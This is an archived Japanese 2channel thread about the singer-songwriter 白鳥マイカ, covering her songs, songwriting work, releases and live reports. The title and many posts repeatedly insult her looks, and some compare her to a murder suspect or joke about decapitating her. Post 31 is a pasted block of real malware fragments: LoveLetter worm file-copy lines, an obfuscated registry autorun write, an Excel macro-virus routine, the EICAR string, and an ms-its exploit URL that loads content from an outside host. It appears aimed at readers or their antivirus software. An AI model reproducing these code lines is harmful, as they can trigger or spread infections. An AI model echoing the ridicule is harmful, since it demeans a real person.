2ちゃんねる ■掲示板に戻る■ 全部 1- 最新50    

■ このスレッドは過去ログ倉庫に格納されています

○歌良し![白鳥マイカ]顔ブス!○

1 :名無しの歌姫:2006/01/11(水) 10:37:19 ID:LO3DLO12.net
白鳥マイカ
1976年9月東京都生まれ
2001年デビュー。
代表作は、『Someday』『こわれ者』など。
その他にもCM曲、他アーティストへの作詞・作曲、
母の白鳥英美子へは三島サラという名前で楽曲提供など、多方面で活動中!!
http://www.maikashiratori.net/

2 :名無しの歌姫:2006/01/11(水) 15:27:15 ID:LO3DLO12.net
白鳥マイカ

3 :名無しの歌姫:2006/01/18(水) 18:21:24 ID:LtTbCoB7.net
マイカルかどこぞのCM曲で知った。
曲がキレイだったので、歌ってる人もさぞかしキレイに違いないと思い込んでたが…


4 :名無しの歌姫:2006/01/18(水) 21:28:09 ID:uuUOPHHk.net
ですよね・・・。
デビュー曲のジャケット写真はめちゃめちゃヤバイです。。

5 :名無しの歌姫:2006/01/19(木) 01:47:14 ID:QUxotTiv.net
そんなにひどいの?
曲は知ってるけど顔知らない

6 :名無しの歌姫:2006/01/19(木) 11:37:44 ID:nDoIvLTh.net
>5
テンプレの公式サイト覗いてみ。
でもね、知らない方が幸せって事も世の中にはあるんだよ…

7 :名無しの歌姫:2006/01/21(土) 23:39:10 ID:ssHKQZUZ.net
以前立ってたスレで「イカに似てる」というカキコがあってお茶吹いた記憶が。

8 :名無しの歌姫:2006/01/21(土) 23:41:33 ID:ssHKQZUZ.net
今公式行ってみたら事務所もレコード会社も離れたみたいだな。
元からそんな売れる人ではないと思ってたがいい曲作ってたのに。

9 :名無しの歌姫:2006/01/23(月) 16:34:35 ID:7o+t/b5R.net
白鳥マイカで好きな曲

1位,Shelter
2位,Red Clover
3位,こわれもの

10 :名無しの歌姫:2006/01/26(木) 08:46:30 ID:tAZ0a5uq.net
CCCDにしちゃなおさら売れないよな。まったく。
地味に長く続けて欲しい。

11 :名無しの歌姫:2006/01/26(木) 21:42:49 ID:mZvmAFK1.net
売れなくてもいいから続けてほしいのぉ

顔は生で見たことあるけど、うん。ちょっとテレビには出られないかな。


12 :名無しの歌姫:2006/01/27(金) 11:03:39 ID:KGZzlmJo.net
応援したいんだか貶したいんだかよく分からんスレね。

13 :名無しの歌姫:2006/01/27(金) 11:13:06 ID:HDKEeYaW.net
外見で貶めても、それを上回るほど歌がいいのよ。


14 :名無しの歌姫:2006/01/28(土) 12:14:23 ID:7i+4uBio.net
白鳥マイカ好きだよ。
やっぱShelterが一番かな…
Circleも地味に好きだが。
ジャケ写は確かにやばいが歌はいいと思う。

15 :名無しの歌姫:2006/01/28(土) 18:35:54 ID:DWHPRQqf.net
歌もいいんだけど、サウンドもかっちょいいよなあ。
そろそろ新曲が聴きたい。

16 :名無しの歌姫:2006/02/24(金) 18:37:34 ID:9gYpA/6h.net
声きれいだ

17 :名無しの歌姫:2006/03/01(水) 04:27:32 ID:rcL8aeog.net
こわれもののジャケはなかなかよかったんジャマイカ

18 :名無しの歌姫:2006/03/04(土) 16:19:48 ID:FsVBHCoD.net
ジャケは顔写真じゃなくて絵とかの方がいいのでは。
無理に顔のせんでも。

19 :名無しの歌姫:2006/03/21(火) 22:20:19 ID:jlB7qCoA.net
スレタイ・・・

20 :名無しの歌姫:2006/04/10(月) 21:37:40 ID:2AlkXbGS.net
実際に見かけたことありますけど、普通でしたよ 写真写りが悪いだな
と思いました

21 :名無しの歌姫:2006/04/23(日) 12:00:51 ID:GBSWZPTf.net
てか、SomedayにPV入ってんじゃん?
あれでどんな顔かよ〜く分かるよ。w
ところでニューアルバムはまだかな?

22 :名無しの歌姫:2006/05/01(月) 19:10:58 ID:fXhAKq5p.net
HPみたら小百合ちゃんのアクオスCMの新しい歌を唄うらしい。
これが切欠で「Someday」の時みたいに又注目されたらいいけどね。

23 :名無しの歌姫:2006/05/11(木) 02:57:47 ID:5clI+egs.net
それはなかなかすごいことじゃないのかな。

YouTube に名曲!「こわれ者」だけあった。
http://www.youtube.com/watch?v=4Y5GeFuP-Xg

24 :名無しの歌姫:2006/06/04(日) 17:00:59 ID:xtjeD1iV.net
 

25 :名無しの歌姫:2006/06/07(水) 10:47:05 ID:cXIH5ItH.net
保守

26 :名無しの歌姫:2006/06/18(日) 21:22:17 ID:MNheDEpx.net
保守

27 :名無しの歌姫:2006/06/21(水) 13:20:39 ID:CzZ7ZAaT.net
ho

28 :名無しの歌姫:2006/06/25(日) 12:31:03 ID:r0gQ6/KR.net
hosyu

29 :名無しの歌姫:2006/06/30(金) 20:22:27 ID:DlBGfjhM.net
geminiのジャケット見て気付いたこと。

この人、秋田の小学生殺人事件の犯人に顔似てない?
顔の下半分がアレなとことかさ。
不謹慎でスマソ

30 :名無しの歌姫:2006/07/05(水) 17:16:25 ID:7/24Zn2G.net
マイカさんはライブになんどかいったことあるが
悪いがぜんぜん似とらんぞ

保守アゲ

31 :名無しの歌姫:2006/07/05(水) 23:27:46 ID:uMwz7JzA.net
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

32 :名無しの歌姫:2006/07/10(月) 16:23:53 ID:CVhXKs0K.net


33 :名無しの歌姫:2006/07/18(火) 13:53:01 ID:f6YiK2Jr.net


34 :名無しの歌姫:2006/07/19(水) 22:23:06 ID:Q9hmYytj.net
ワンマンライブ決定記念age


35 :名無しの歌姫:2006/07/23(日) 17:59:10 ID:CuH5j+1R.net
この前深夜に宮崎あおいの映画が放送されてて
そのエンディング曲で流れてた人が、この白鳥マイカって人なんだけど
その流れてた、曲名ってなに?めちゃくちゃ良いなぁ〜〜〜〜〜〜〜と思った。

36 :名無しの歌姫:2006/08/03(木) 23:53:05 ID:lb+luJzv.net
保守

37 :名無しの歌姫:2006/08/08(火) 04:13:37 ID:xlNLEJQl.net
いい曲出してるのにここまで人気ないのか

38 :名無しの歌姫:2006/08/11(金) 11:42:41 ID:RtdKP9Dd.net
蜷川幸雄クリソツだと思うのですが

39 :名無しの歌姫:2006/08/23(水) 09:44:17 ID:nAsK7zr/.net
あげ

40 :名無しの歌姫:2006/08/23(水) 11:18:24 ID:rThcM98q.net
さーむでい

41 :名無しの歌姫:2006/08/24(木) 19:40:39 ID:3uxNIT17.net
「タイヨウのうた」曲提供したんだね。売れそうだな。
どうせなら女優が唄うより、作者本人に歌ってほしかった。

42 :名無しの歌姫:2006/08/25(金) 02:58:26 ID:rdZaqseG.net



43 :名無しの歌姫:2006/08/26(土) 13:32:29 ID:8CwT0EQz.net
確実に大ヒットですね。問い合わせ殺到だって。クレジットで注目されたらいいけど。

44 :名無しの歌姫:2006/08/27(日) 02:42:35 ID:t0wx8m++.net
このままマイカがソニーに移籍してくるのかな

45 :名無しの歌姫:2006/08/30(水) 19:07:17 ID:Mnk/8lrD.net
デイリー2位だって。
美人が歌うとこんなにも違うんだね。
これ一曲で今までの印税の何倍にもなるだろうね。

46 :名無しの歌姫:2006/09/01(金) 02:46:04 ID:RcHEEhiw.net
提供に回るだけじゃなく白鳥マイカにも歌って欲しいなぁ…
中学の頃「Red Clover」って曲を聴いてから気になったんだよね
やっぱり世の中重要なのは「タイアップ」と「顔」「コネ」なの…?

47 :名無しの歌姫:2006/09/01(金) 05:50:50 ID:u0OlVKDW.net
ああ、シャンプーのCMの人か?たしかに美人だ。
でもPVをyoutubeで見たけど、わりと凡庸な曲かな。
白鳥本人が歌っていたシングル曲に比べたらね。
ソニーのことだから何か仕掛けがあるんだろうね。
これだけ売れるのは。

48 :名無しの歌姫:2006/09/03(日) 03:33:41 ID:hECVc5Tw.net
ブスが歌っても売れない〜♪
可愛いエリカが歌うと売れる〜♪

49 :名無しの歌姫:2006/09/06(水) 20:01:41 ID:oXhi2Qrj.net



50 :名無しの歌姫:2006/09/08(金) 20:31:50 ID:IBp+SKGs.net
美人でも音楽の才能すごくても売れない人は結構いるし
やっぱりつくづく仕掛け先行の世界だと思う

51 :名無しの歌姫:2006/09/11(月) 22:47:52 ID:aAmxMCKI.net



52 :名無しの歌姫:2006/09/13(水) 02:44:04 ID:4Ir63urF.net
エリカチャンの歌が好きです(*^_^*)☆。。
白鳥マイカさんキレぃな名前だからキレぃな人と思ったら違ぅんですね(^_^;)
でもエリカチャンに歌ってもらえて良かったですね☆

53 :名無しの歌姫:2006/09/18(月) 09:49:12 ID:QbnHx2ZF.net
age

54 :名無しの歌姫:2006/09/18(月) 09:56:28 ID:NpuifBOt.net
この人、声だけじゃなくて顔まで母親そっくりだよね
容姿も親譲りなのはまったく気の毒だ

55 :名無しの歌姫:2006/09/19(火) 00:06:19 ID:ZpNiqtWT.net
スレタイみてかなり笑ったwww

山下達郎と似てるかも。
いい曲書くし声も良い、けど顔が…なとことか。

早く新曲出さないかな。

56 :名無しの歌姫:2006/09/21(木) 00:39:51 ID:Q0h7kaXY.net
「タイヨウのうた」本人バージョンをボーナストラックにして
ベスト盤発売・・・とかね。

57 :名無しの歌姫:2006/09/22(金) 03:10:14 ID:DEOioFwf.net
もう顔のはなしはいいじゃないか


58 :名無しの歌姫:2006/09/28(木) 10:03:59 ID:TSy9ECUM.net
何だかスレタイも含めて悲しい気持ちだ。

59 :名無しの歌姫:2006/09/28(木) 16:53:50 ID:+tfHuRkl.net
落ちた


60 :名無しの歌姫:2006/09/28(木) 19:04:30 ID:RF4Ai4fe.net
印税ガバガバは来年かw
再来年は税金が払えなくなりそう

61 :名無しの歌姫:2006/09/29(金) 03:11:17 ID:ZLvAIbvz.net
女性歌手の今年売り上げ倖田を抜いてトップなんだってね
あまり白鳥マイカ自身は注目されなかったな

62 :名無しの歌姫:2006/10/02(月) 19:45:21 ID:yokXChtb.net



63 :名無しの歌姫:2006/10/12(木) 03:15:34 ID:A2ESpfyB.net
sage

64 :名無しの歌姫:2006/10/12(木) 03:16:15 ID:A2ESpfyB.net
a

65 :名無しの歌姫:2006/11/12(日) 10:26:57 ID:Vr5I3mN/.net
普段何してるんだろうね

66 :名無しの歌姫:2006/11/30(木) 18:18:15 ID:CKgxukyX.net
だれ

67 :名無しの歌姫:2006/11/30(木) 23:23:35 ID:kKwUoy6m.net
やっぱデビュー曲のShelterが衝撃的だったな。
この人、もともとカバー曲中心でやってて、カバーじゃレコードは出せないから
オリジナル書いておいでって言われて曲づくり始めたんだよな。
ほとんどスリーコードであそこまでの曲、そうそう作れないよ。

68 :名無しの歌姫:2006/12/01(金) 13:20:48 ID:jsAPIPFE.net
レコード

69 :名無しの歌姫:2006/12/06(水) 00:16:34 ID:rEoidrET.net
15年くらい前のカルピスウォーターのCM曲で
白いKiss瞼にはじ〜けた〜♪
の歌手がマイカプロジェクトというのだが白鳥マイカと同一人物ですか?

70 :名無しの歌姫:2006/12/06(水) 10:10:46 ID:sS3ohUzr.net
>>69
それを歌ってたのは熊谷幸子という人らしいです。
マイカプロジェクトはそれを作詞したユニットの名前で
マイカミュージックラボラトリーという学校の生徒から選ばれた人たちなので
白鳥さんとは無関係だと思います。

71 :名無しの歌姫:2007/01/22(月) 21:12:08 ID:H9fGUfuM.net
保守

72 :名無しの歌姫:2007/01/28(日) 15:13:57 ID:rt9BJ8gL.net
で、次のアルバムはまだか
いやシングルでも良いんだけど
ずっと待ってるんだけど

73 :名無しの歌姫:2007/01/31(水) 02:18:47 ID:gN8BOMUR.net
d

74 :名無しの歌姫:2007/02/01(木) 01:52:23 ID:Q0Rxd0eP.net
アンチスレみたいなスレタイだな。

75 :名無しの歌姫:2007/02/02(金) 19:34:09 ID:MnLujZVg.net
!!!

76 :名無しの歌姫:2007/02/08(木) 21:12:44 ID:r6rLMTYU.net
歌は下手じゃないんだからもっと売り出し方考えたらいいのにね

77 :名無しの歌姫:2007/02/19(月) 22:57:27 ID:s+nWAhxE.net
age

78 :名無しの歌姫:2007/03/04(日) 16:40:34 ID:0XonaQyO.net
♪笑って〜泣いて〜キモいと言われて〜

79 :名無しの歌姫:2007/03/18(日) 05:46:25 ID:sYCnvQbj.net


80 :名無しの歌姫:2007/03/22(木) 14:19:47 ID:Lv43Yc+V.net
・・○

81 :名無しの歌姫:2007/04/29(日) 02:49:05 ID:5pnMTrUx0.net
ステタイみて開いてしまったw

82 :名無しの歌姫:2007/05/12(土) 05:51:29 ID:4aAAjgzY0.net
新曲の「青空」は聞いた?どんなかね。


83 :名無しの歌姫:2007/05/23(水) 06:19:10 ID:zo5PB6IOO.net
ブス

84 :名無しの歌姫:2007/05/25(金) 12:27:29 ID:Xvq5Oie00.net
シングル「不細工でも抱きしめて」
アルバム「綺麗になりたくて」

同時発売age

85 :名無しの歌姫:2007/05/31(木) 22:09:23 ID:laUU/56HO.net
あげ

86 :名無しの歌姫:2007/06/12(火) 23:28:14 ID:Ks40fGJP0.net
age

87 :名無しの歌姫:2007/06/16(土) 16:46:18 ID:NXCmAnIt0.net
8/1 Single「会いたい」

88 :名無しの歌姫:2007/06/19(火) 11:05:58 ID:YMHPYk/w0.net
(;´д`)ハアハア

89 :名無しの歌姫:2007/07/10(火) 21:07:55 ID:1n8jh31j0.net
このスレ伸びないな。
こんなにいい曲ばかりだしてる歌手も珍しいと思うんだが。


90 :名無しの歌姫:2007/07/10(火) 21:34:59 ID:3NxZMkIRO.net
エリカ様の新曲の作詞やってるね!マイカ様

91 :名無しの歌姫:2007/07/13(金) 17:11:35 ID:7k/ujgUO0.net
8/1 7th Sg 「会いたい」
     UICZ-5033 ¥1000
     1.会いたい ※TBS系「噂の!東京マガジン」エンディングテーマ
     2.BLACKBIRD  ※ビートルズのカバー
     3.Best wishes!


9/12 4th AL 「陽光線 -hikousen-」
     UICZ-4171 ¥2500
     1.青空
     2.冒険者たち
     3.うすあかの花
     4.友達のまま
     5.記憶の風
     6.会いたい
     7.笑顔のどこかに
     8.Star
     9.タイヨウのうた
     10.Smile(ボーナス・トラック)
ttp://www.towerrecords.co.jp/sitemap/CSfCardMain.jsp?GOODS_NO=1630021&GOODS_SORT_CD=101

92 :名無しの歌姫:2007/08/01(水) 23:10:17 ID:CfCnGwxS0.net
発売日age

93 :名無しの歌姫:2007/08/12(日) 09:49:11 ID:jmOxgy8g0.net
「会いたい」のドラムは青山純さん?

94 :名無しの歌姫:2007/08/12(日) 15:20:57 ID:Vv6Kdqxq0.net
http://
http://??x3000;?x3000;?x2502;?x3000;
http://??x3000;?x3000;?x2502;?x3000;?x3000;?x3000;?x2229;?x3000;
http://??x3000;?x3000;?x2502;?x3000;?x2282;?x2312;?x5E;?x30FD;?x3000;?x3000;?x3000;?x3000;?x3000;?x3000;?x3000;?x3000;?x28;?xB4;?xB4;?x3000;
http://??x3000;?x3000;?x2502;?x5F61;?x30CE;?x3000;?x3000;?x30CE;?x3000;?x3000;?x3000;?x3000;?x3000;?x3000;?x3000;?x28;?xB4;?x2312;?x28;?xB4;?x3000;
http://??x2606;?x30DF;?x3A3;?x28;?xFF08;?x3064;?x3000;?x30CE;?x2283;?x2261;?x2261;?x2261;?x28;?xB4;?x2312;?x3B;?x3B;?x3B;?x2261;?x2261;?x2261;?x3000;
http://??x3000;?x2606;?x5F61;?xFFE3;?xFFE3;?xFFE3;?x28;?xB4;?x2312;?x28;?xB4;?x2312;?x3B;?x3B;?x3000;

95 :名無しの歌姫:2007/08/23(木) 08:02:52 ID:vrZD6CGF0.net
ag

96 :名無しの歌姫:2007/08/25(土) 06:37:30 ID:ElxTLJui0.net
白鳥マイカ、自らカバー…再び輝く「タイヨウのうた」
ttp://hochi.yomiuri.co.jp/entertainment/news/20070825-OHT1T00018.htm

97 :名無しの歌姫:2007/09/06(木) 03:21:58 ID:nSD3s9jS0.net


98 :名無しの歌姫:2007/09/10(月) 02:39:59 ID:L568X5QA0.net
実は2001年のデビュー前に2000年には母親英美子さんのアルバムに楽曲提供し
95年頃には同じく英美子さんのアルバムで一曲デュエットした曲を発表してたんだね

99 :名無しの歌姫:2007/09/14(金) 22:49:56 ID:b6+/Goxv0.net
今、白鳥マイカがTVに出ていたのに、、、

カキコは僕一人だけですか?

100 :名無しの歌姫:2007/09/15(土) 12:14:18 ID:Oa1OLaraO.net
>>99
詳細kwsk


101 :名無しの歌姫:2007/09/15(土) 14:03:29 ID:GX2W0D8c0.net
オフィシャルにも出てるけど『たけしの誰でもピカソ』に出てたよ。
途中からしか観てないけど、英美子さんと2人で歌ったりしてた。

102 :名無しの歌姫:2007/09/16(日) 12:27:37 ID:5VmkKjw9O.net
詳細thx!
こっちの地方だと三週間遅れでやるみたいだ。
11月に近くでライブやるみたいだしまじでwktk、何はともあれ情報ありがとう。

103 :名無しの歌姫:2007/09/20(木) 02:41:00 ID:ddPqUUpJ0.net
整形したらどうだろう。
声はいいのに。


104 :名無しの歌姫:2007/09/22(土) 01:23:56 ID:9Te233Ue0.net
忍者ハットリ君のお面つけて人前に出たらいい、これからは。

105 :名無しの歌姫:2007/09/22(土) 16:08:29 ID:r5NTUE+b0.net
ニンニン









106 :名無しの歌姫:2007/09/24(月) 03:58:12 ID:wL6re4pY0.net
ニンニンでおわりなのか?


107 :名無しの歌姫:2007/09/28(金) 20:38:57 ID:oVw3K7Qb0.net
首から上ちょん切って白人美人の頭移植したらいいw

108 :名無しの歌姫:2007/10/02(火) 02:34:24 ID:vWBj7eq50.net
本人がこんな書き込み見たら泣くよ。
でも泣き顔もキモイかも。


109 :名無しの歌姫:2007/10/06(土) 10:19:42 ID:jZA2zefJ0.net
hosyu

110 :名無しの歌姫:2007/10/07(日) 00:22:45 ID:CxQU/MZJ0.net
hosyu2

111 :名無しの歌姫:2007/10/12(金) 00:07:07 ID:WWL/Aw000.net
hosyu3

112 :名無しの歌姫:2007/10/13(土) 11:29:39 ID:4BTPyq+H0.net
アルバムからのリカットシングルがドラマ主題歌決定!

113 :名無しの歌姫:2007/10/13(土) 18:49:05 ID:Mvomg6DPO.net
今日うちの近くのTSUTAYAで、白鳥マイカさんのインストアライブがあって
初めて歌、顔等を知りここにきました。歌良かったですよ。
子連れが多く、ほのぼのでした。その後サイン会はあまりに人が少なく可哀相でした。
私はアルバム買いました。頑張っている姿に感動しました。

顔、綺麗でしたよ。ただ残念なのは、黒い服だったこと。機材や店の棚等が黒いんで
同化してしまい、あまり目立たなかったです。インストアとはいえライブだし、
もう少し華やかにした方が良いと思いました。せめてベージュや水色などの明るい色が良かった。
素朴なマイカさんの雰囲気と黒い服はミスマッチでした。

114 :名無しの歌姫:2007/10/13(土) 18:50:22 ID:Mvomg6DPO.net
長文&頭悪そうな文スマソ

115 :名無しの歌姫:2007/10/14(日) 23:08:52 ID:qxH5xiMrO.net
>>113
私もあのインストアライブ見てました。あの後サイン会なんてあったんですか?

116 :113:2007/10/15(月) 20:54:43 ID:i1bz6bEVO.net
>>115
たぶんシングルかアルバムわ買った人に、ってやつです。
あそこにいらしたんですか!かなり可哀相なライブ場所ですよね…

117 :名無しの歌姫:2007/10/15(月) 23:33:59 ID:l3fO651x0.net
渋谷duoのチケット買ったよ。
安いし、ぴあでまだ売ってるから、ここ見た人は行ってみましょう。
立見だけど、もみくちゃになるようなことはないと思う。


118 :名無しの歌姫:2007/10/24(水) 00:57:30 ID:FC69FRaj0.net
hosyu

119 :名無しの歌姫:2007/10/27(土) 15:48:37 ID:3PXzdEa90.net
hosyu2

120 :名無しの歌姫:2007/10/30(火) 00:17:59 ID:4dQB2pts0.net
hosyu3

121 :名無しの歌姫:2007/11/02(金) 00:27:37 ID:idYIQF2B0.net
duo行って来ました。少し短いけど、良いコンサ−トでした。
何より、本人たちが楽しそうに演奏していたのが印象的でした。
ほぼ曲ごとに丁寧に曲名紹介して歌ってました。構成は新アルバム中心に、
前の曲も少し入れるという感じでした。
衣装はうす茶色のドレスで、ひらひらしてました。アンコ-ルの時は、ツア−Tシャツに、ちょうちん(?)スカ−ト。
顔は写真の通りだけど、歌う表情がかわいいひとです。
背は靴のせいもあるけど、本当に高かった。がたいもいい、がっちりガテン系でした。いかり肩で二の腕も太かった。
CDで聞くのもいいけど、やっぱり生で聞くのが一番。
いすとテ−ブルもでて、ゆったり聞けて、3000円は安かった。




122 :名無しの歌姫:2007/11/07(水) 18:16:12 ID:HzzvRS7XO.net
名古屋FITS ALLで開場待ち
6時半からなのに現在俺含めて二人しかいなくて俺涙目。

123 :名無しの歌姫:2007/11/08(木) 12:19:26 ID:+H2pRmqT0.net
地元の求人誌、巻頭インタビューが白鳥マイカだった
見開き一ページ。左が新アルバムとライブの宣伝、右半分がインタビュー
「タイヨウの歌」のコメントとか、自分のバイト経験とかを語ってた
びっくりしたが嬉しかったな(´∀`*)

124 :122:2007/11/08(木) 21:05:33 ID:nbKqVhXG0.net
名古屋live行ってきました。上にあるとおりちょっと短めの二時間きっかりで終了、時間の流れが本当に早かった。
うろ覚えながらもセトリ

青空
アンドロイド
うすあかの花
冒険者達
some day
会いたい
笑顔のどこかで

タイヨウのうた
記憶の風
友達のまま
Best wishes!
Red clover
こわれ者
SMILE

en.
star
shelter

順番違いや抜けがあるかもしれませんがご容赦を。

125 :名無しの歌姫:2007/11/10(土) 23:16:04 ID:moxaTTca0.net
Red cloverいいよね

126 :名無しの歌姫:2007/12/21(金) 01:07:35 ID:Ys75v65m0.net
hosyu

127 :名無しの歌姫:2007/12/23(日) 23:12:36 ID:f03+oYWF0.net
顔無州って

ワロス

128 :名無しの歌姫:2008/01/06(日) 02:51:35 ID:DTq8ELS70.net
そんなに顔悪くないと思うが。

129 :名無しの歌姫:2008/01/19(土) 14:46:17 ID:wQWbuOYQ0.net
すきずきだよね。
むしろガタイがすごい。でかくて、がっちり。

130 :名無しの歌姫:2008/01/31(木) 23:56:24 ID:S2OHRtu+O.net
遥花いいね

131 :名無しの歌姫:2008/02/15(金) 21:32:39 ID:dz4i2oy40.net
もう本業は作詞作曲家だな。


132 :名無しの歌姫:2008/02/19(火) 00:33:46 ID:WaS/hh4pO.net
白鳥マイカの歌声じゃなきゃダメだ

133 :名無しの歌姫:2008/02/20(水) 19:55:51 ID:BXDifmjy0.net
初登場10位!
マイカちゃんの歌がマイカちゃんで売れてくれればいちばんいい。

134 :名無しの歌姫:2008/02/24(日) 12:58:14 ID:B7ppt9npO.net
何も知らずに遥花買って作詞作曲の欄見て驚いた
この頃サイト確認してなかったから知らなかったよ


135 :名無しの歌姫:2008/03/05(水) 01:16:38 ID:MO9/VEPhO.net
遥花、タイヨウのうたみたくセルフカバーしないかな

136 :名無しの歌姫:2008/03/06(木) 02:29:18 ID:l2kSSwGs0.net
今度、稲垣純一に曲提供するみたいだね。

137 :名無しの歌姫:2008/03/06(木) 02:31:39 ID:l2kSSwGs0.net
間違えた、作詞だけだったww
しかも一ヶ月前に発売してるし、もうね。

138 :名無しの歌姫:2008/04/15(火) 12:50:04 ID:uGxSZedp0.net


139 :名無しの歌姫:2008/05/06(火) 02:26:12 ID:MaQC0lmR0.net
前にライブでピアノ弾いてたメガネのやつキモイ
イラネ

140 :名無しの歌姫:2008/05/14(水) 18:53:14 ID:HKTyaQ+30.net


141 :名無しの歌姫:2008/05/30(金) 19:50:15 ID:ULEA9Mzx0.net
Live期待age
チケットの発送早いね。
今回整理番号も無しか。

142 :名無しの歌姫:2008/06/08(日) 21:11:32 ID:KaXcoNcwO.net


143 :名無しの歌姫:2008/06/09(月) 17:40:32 ID:JqjZJr7+O.net
Geminiのジャケっていったいなんなんですか(笑)

144 :名無しの歌姫:2008/06/11(水) 12:49:27 ID:XO3lsdc60.net
今週一週間、NHK−FMに出てるよ
大半は他人の曲を聴く番組だが

145 :名無しの歌姫:2008/06/13(金) 23:40:31 ID:8jbNMNMr0.net
ん車の中で始めて聞いた良いかも

146 :名無しの歌姫:2008/06/15(日) 22:03:46 ID:TsfGOED6O.net
ひでえスレタイ
でも確かにブス

147 :名無しの歌姫:2008/06/27(金) 20:47:14 ID:4imJROCEO.net
うまれ〜ては〜消えてゆ〜く

148 :名無しの歌姫:2008/08/13(水) 23:46:03 ID:x92nDCjx0.net
hosyu

149 :名無しの歌姫:2008/08/22(金) 22:54:33 ID:mtV5TF7RO.net
ブス

150 :名無しの歌姫:2008/09/27(土) 13:22:57 ID:7V5YQDk40.net
保守

151 :名無しの歌姫:2008/10/17(金) 18:53:26 ID:9EXQj5Vn0.net
伊藤由奈さんのmiss youはスルーですか?

152 :名無しの歌姫:2008/11/11(火) 23:30:36 ID:F/kTFx2k0.net
白鳥マイカ単独ライブ2008シリーズをしめくくる
12月の第三弾ライブ決定!!!

今回はクリスマスもイブイブ!のささやかな
ミニクリスマスライブをお届けしたいと思います。

ゲストには
第一弾でご一緒したアコギユニット『京太朗と晴彦』、
第二弾でご一緒した女性シンガーソングライター『Hanah』を
お迎えしてのフレンドリーなマイカの小部屋ライブです。
皆様お誘い合わせの上、是非遊びに来て下さい!

"マイカの小部屋 '08 " ?X'mas?

日時:2008年12月22日(月)
   開場18:30/開演19:30
場所:南青山MANDARA
   http://www..mandala.gr.jp/aoyama.html
料金:¥4500 (1ドリンク付・税込)
   ※ドリンク代=700円
   整理番号順入場制


153 :名無しの歌姫:2008/11/12(水) 19:47:44 ID:hhObFOdIO.net
ビューティーコロシアムにそのうち出てきそう。

売れないのは顔のせい!とか(笑)

154 :名無しの歌姫:2008/12/02(火) 10:48:19 ID:J5sUXcA50.net
彼女が顔が美人になったとしても売れないとおもうよ
音楽性がコアやし、大衆受けはせんと思う。

すべて顔のせいにしてる人が多いが、ブスでもメジャーな人いるじゃん。
ただしこの人の場合ブスなのにかわいらしさがないな。

アイコのようにブスだけど、かわいらしさがあればよかったのに。

155 :名無しの歌姫:2008/12/02(火) 16:38:11 ID:gHLpsk+AO.net
ラブサイケデリコやTina、奥村愛子みたいに
イラストをジャケにしてればよかったのにね。

156 :名無しの歌姫:2008/12/09(火) 22:48:03 ID:Ok244vht0.net
ブス!

157 :名無しの歌姫:2008/12/16(火) 16:56:52 ID:h4XHiVU20.net
hosyu

158 :名無しの歌姫:2009/01/17(土) 23:11:37 ID:D6vl9CtpO.net
ミューズの晩餐つけたら稲垣潤一とデュエットしたとかで久しぶりに名前見たわ
根岸さんとレディヘのfake plastic tree歌った辺りから聴いてないけど

159 :名無しの歌姫:2009/02/12(木) 03:57:35 ID:lWE6fDdbO.net
つべで関連動画に出てたから聞いてみたけど、歌キレイでいいね  

ジャケをちゃんと考えれば普通に売れると思うんだけど
有名なデザイナーに頼むとか

160 :名無しの歌姫:2009/02/14(土) 23:07:34 ID:3wnZuUR00.net
><

161 :名無しの歌姫:2009/02/15(日) 23:15:11 ID:pv+PrBgK0.net
^^

162 :名無しの歌姫:2009/04/15(水) 22:10:46 ID:oyeXeTZT0.net
母親と一緒に活動。

163 :名無しの歌姫:2009/04/26(日) 22:26:45 ID:oJGILRXO0.net
ほしゅ


164 :名無しの歌姫:2009/05/11(月) 16:05:36 ID:+M3fQfcV0.net
ジャケにセンスの欠片も感じない
せっかく曲は良いのに残念
あれでは手に取らない
頑張ってほしいな

165 :名無しの歌姫:2009/06/18(木) 01:40:47 ID:ECvCSnAq0.net
hosyu

166 :名無しの歌姫:2009/07/03(金) 01:31:35 ID:ziIflMD80.net
age

167 :名無しの歌姫:2009/07/03(金) 05:08:13 ID:LDXmN1bb0.net
714 :名無しの歌姫:2009/07/03(金) 00:40:25 ID:g9kYxobs0
伊藤由奈のアルバムDREAMをTSUTAYAで借りてきました。
「miss you」をフルコーラスで初めて聴きましたが良い歌です。
楽曲提供が白鳥マイカさんとのことで納得しました。
白鳥マイカさんといえば「遥花?はるか?」を楽曲提供された方ですね。

715 :714:2009/07/03(金) 00:43:38 ID:g9kYxobs0
「遥花?はるか?」→「遥花〜はるか〜」

168 :名無しの歌姫:2009/07/05(日) 16:19:31 ID:K2h7kJFMO.net
顔のインパクトがすごすぎてびっくらこいた

169 :名無しの歌姫:2009/07/09(木) 00:06:19 ID:IYg+WGyP0.net
それほど酷くはないよ


170 :名無しの歌姫:2009/07/10(金) 02:41:11 ID:j9kJK8Yz0.net
公式見ると日記はポツポツ更新してるね
LIVEの予定は全然なしか。
またduoでやらないかな?


171 :名無しの歌姫:2009/07/18(土) 16:24:02 ID:A2ljKBpO0.net
遥花ってどこかで聴いたことあるメロディだと思ってたらタイヨウのうただったか

